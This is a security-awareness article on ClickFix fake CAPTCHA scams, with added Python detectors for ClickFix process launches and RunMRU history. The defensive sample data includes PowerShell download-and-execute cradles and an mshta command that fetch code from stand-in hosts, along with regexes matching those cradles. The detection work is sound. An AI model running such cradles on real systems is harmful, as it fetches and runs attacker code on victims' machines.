Fake CAPTCHA Scams: ClickFix Malware and How to Avoid

July 24, 2025 at 12:00 AM

Cybercriminals are weaponizing fake human-verification pages. These rogue CAPTCHAs, usually part of the ClickFix social engineering technique, trick you into pasting and running a command that uses trusted Windows tools to silently download and execute malware.

What’s driving the surge

  • Bots now account for more than half of internet traffic, and nearly two-fifths of all traffic comes from malicious bots.
  • People trust CAPTCHA challenges and click quickly to reach content.
  • Multi-step verification feels normal, so unusual prompts raise fewer red flags.
  • Attackers hide behind legitimate Windows utilities (e.g., PowerShell, mshta.exe) to evade detection.

Where you’ll encounter fake CAPTCHAs

  • Phishing emails, texts, and social media messages—now more convincing thanks to generative AI and multilingual lures.
  • Legitimate websites booby-trapped with malicious ads or injected content (malvertising), sometimes requiring minimal interaction before the fake CAPTCHA appears.

How the scam unfolds

  • A page resembling reCAPTCHA appears and instructs you to do things real CAPTCHAs never ask for:
    • Click repeatedly to “verify you’re human.” The click also triggers a script on the page that silently copies a command to your clipboard.
    • Press Windows key + R to open the Run dialog.
    • Press Ctrl+V to paste that command, then press Enter.
  • The pasted command invokes a trusted Windows tool (typically PowerShell or mshta.exe) to fetch the next-stage payload from an attacker-controlled server and run it. Because the download is made by a signed Windows binary rather than the browser, it sidesteps the browser’s download warnings.
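The chain above leaves a distinctive footprint in process-creation telemetry: a command pasted into Win+R is spawned by explorer.exe, and the child is a scripting host whose command line reaches out to a URL. The following is an added detection example, not code from the original article or from ESET; the events are constructed, the field names mirror Sysmon Event ID 1, and the inclusion of pwsh.exe and cmd.exe alongside the PowerShell and mshta.exe the article names is an assumption. The “captcha_decoy” indicator reflects the commonly reported habit of appending a fake verification string as a trailing comment so the Run box looks like part of the CAPTCHA.

```python
"""Flag ClickFix-style process creations: a LOLBin launched from the Run dialog
(parent explorer.exe) whose command line fetches something from a URL.
Added example with constructed sample events; fields mirror Sysmon Event ID 1."""
import re
from dataclasses import dataclass

RUN_DIALOG_PARENT = "explorer.exe"          # Win+R commands are spawned by explorer.exe
# Tools the article names (PowerShell, mshta.exe) plus pwsh.exe/cmd.exe (assumed)
LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}

INDICATORS = {
    "remote_url": re.compile(r"https?://", re.I),
    "download_cradle": re.compile(
        r"\b(?:iwr|irm|iex|invoke-webrequest|invoke-restmethod|invoke-expression"
        r"|downloadstring|downloadfile)\b", re.I),
    "hidden_or_bypass": re.compile(
        r"(?:^|\s)-(?:w(?:indowstyle)?\s+hidden|nop\b|noprofile\b|ep\s+bypass"
        r"|executionpolicy\s+bypass|enc\b|encodedcommand\b)", re.I),
    # Decoy text often appended as a comment so the Run box looks like a verification step
    "captcha_decoy": re.compile(r"robot|captcha|verif", re.I),
}


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def clickfix_indicators(ev: ProcEvent) -> list[str]:
    """Names of matched indicators, or [] when the event is not ClickFix-like."""
    if basename(ev.parent_image) != RUN_DIALOG_PARENT or basename(ev.image) not in LOLBINS:
        return []
    hits = [name for name, rx in INDICATORS.items() if rx.search(ev.command_line)]
    # A plain shell opened from Run is normal; require a remote fetch of some kind
    if "remote_url" not in hits and "download_cradle" not in hits:
        return []
    return hits


def scan(events: list[ProcEvent]) -> list[tuple[ProcEvent, list[str]]]:
    return [(ev, hits) for ev in events if (hits := clickfix_indicators(ev))]


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed, not real telemetry
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe"),
    ProcEvent(r"C:\Windows\explorer.exe", PS, "powershell"),
    ProcEvent(r"C:\Windows\explorer.exe", PS,
              'powershell -w hidden -ep bypass -c "iex (irm https://cdn-assets.example/v.txt)"'
              ' # "I am not a robot - reCAPTCHA Verification ID: 7624"'),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
              "mshta https://cdn-assets.example/check.hta"),
    ProcEvent(r"C:\Windows\System32\services.exe", PS,
              'powershell -c "irm https://updates.example/x | iex"'),
]

if __name__ == "__main__":
    for ev, hits in scan(SAMPLE_EVENTS):
        print(f"FLAGGED {basename(ev.image)} <- {basename(ev.parent_image)}: {hits}")
        print(f"    {ev.command_line}")
```

Only the two explorer.exe-spawned events that reach out to a URL are flagged; a user simply opening PowerShell from Run, and a scheduled download cradle launched by services.exe, are left for other rules. In production, the parent check is what keeps this rule quiet: legitimate admin scripts rarely originate from the Run dialog.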

What gets installed

  • Infostealers: They harvest logins, cookies, emails, crypto wallets, screenshots, keystrokes, and more. In 2024, at least 23 million victims—mostly on Windows—lost over two billion credentials. Lumma Stealer alone compromised up to 10 million devices before a global disruption effort that included ESET.
  • Remote access trojans (RATs): Tools like AsyncRAT (seen in about 4% of incidents in 2024) give attackers remote control for data theft and keylogging.
  • Other threats: Ransomware, cryptominers, and even nation-state-aligned malware.

Red flags to spot a rogue CAPTCHA

  • Any “verification” that asks you to open the Run dialog (Win+R) or a terminal, paste commands, or execute scripts. No real CAPTCHA needs anything outside the browser.
  • CAPTCHA prompts appearing out of context, on unrelated pages, or repeatedly.
  • Pressure to click through multiple times without a clear purpose.

How to stay safe

  • Keep your operating system and browser up to date.
  • Use reputable, up-to-date security software.
  • Avoid pirated software (a common malware delivery channel).
  • Consider an ad blocker to reduce exposure to malvertising.
  • Slow down and scrutinize any unexpected verification steps.
  • On managed devices, remove the Run dialog via Group Policy (Start Menu and Taskbar > “Remove Run menu from Start Menu”) where users don’t need it, and enable PowerShell script block logging so any pasted command is recorded.

If you already clicked

  • Disconnect from the internet. Before wiping anything, find out what was run: the Run dialog keeps its history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, so the pasted command can usually be recovered from there.
  • Run a full malware scan with trusted security software.
  • Back up important data files, then perform a factory reset or clean reinstall if the scan finds anything or you are unsure.
  • Change all passwords from a device you know is clean; an infostealer may still be capturing keystrokes on the affected one. Use strong, unique credentials stored in a password manager.
  • Enable multi-factor authentication (MFA) on all accounts and sign out of active sessions elsewhere, since stolen cookies can be replayed without a password.
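When triaging a machine after the fact, the quickest way to see exactly what the victim pasted is the RunMRU key. The following is an added example, not from the original article or from ESET: it parses the text of a `reg export` of that key, lists the entries most-recent-first (the MRUList value records the order), strips the literal `\1` suffix each entry carries, and flags anything that looks like a ClickFix command. The export text is constructed; the registry key path and the `\1` convention are real.

```python
"""Recover what was typed into Win+R from a RunMRU registry export, most recent
first, and flag entries that look like a ClickFix command. Added example; the
.reg text below is constructed, not a real export."""
import re

RUNMRU_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"

# Shape of `reg export "HKCU\...\Explorer\RunMRU" runmru.reg` output (constructed).
# reg.exe escapes backslashes as \\ and quotes as \"; each entry ends in a literal \1.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU]
"MRUList"="cba"
"a"="notepad\\1"
"b"="\\\\fileserver\\share\\1"
"c"="powershell -w hidden -c \"iex (irm https://cdn-assets.example/v.txt)\" # \"I am not a robot\"\\1"
'''

_REG_VALUE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')
# Rough triage filter: remote fetch, download cradle, mshta, or a hidden window
SUSPICIOUS = re.compile(r"https?://|\b(?:iex|irm|iwr|mshta)\b|-w\s+hidden", re.I)


def _unescape(s: str) -> str:
    """Undo reg.exe escaping: \\ -> \ and \" -> "."""
    return re.sub(r"\\(.)", r"\1", s)


def parse_runmru(reg_text: str) -> list[tuple[str, str]]:
    """Return (slot, command) pairs in MRU order (most recent first)."""
    values, in_key = {}, False
    for line in reg_text.splitlines():
        line = line.strip()
        if line.startswith("["):
            in_key = line.strip("[]").lower() == RUNMRU_KEY.lower()
            continue
        m = _REG_VALUE.match(line) if in_key else None
        if m:
            values[_unescape(m.group(1))] = _unescape(m.group(2))
    order = values.pop("MRUList", "")      # e.g. "cba": slot c is the newest
    entries = []
    for slot in order:
        cmd = values.get(slot)
        if cmd is None:
            continue
        if cmd.endswith("\\1"):
            cmd = cmd[:-2]                 # strip the \1 suffix RunMRU appends
        entries.append((slot, cmd))
    return entries


def suspicious_entries(reg_text: str) -> list[tuple[str, str]]:
    return [(slot, cmd) for slot, cmd in parse_runmru(reg_text) if SUSPICIOUS.search(cmd)]


if __name__ == "__main__":
    for slot, cmd in parse_runmru(SAMPLE_REG):
        tag = "SUSPICIOUS" if SUSPICIOUS.search(cmd) else "ok"
        print(f"[{slot}] {tag}: {cmd}")
```

To use it on a real machine, export the key with `reg export "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" runmru.reg` and read the file with `encoding="utf-16"` (reg.exe writes UTF-16 LE with a BOM). Two caveats: RunMRU only covers the Run dialog, so a variant that told the victim to paste into the File Explorer address bar leaves its trace under the neighbouring TypedPaths key instead, and a command pasted straight into an interactive PowerShell window will appear in that user’s ConsoleHost_history.txt rather than here.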

Bottom line
Fake CAPTCHA pages are a fast-growing malware delivery vector. Treat any verification that asks you to run commands as a major red flag, and act quickly if you slip up.

Source: WeLiveSecurity
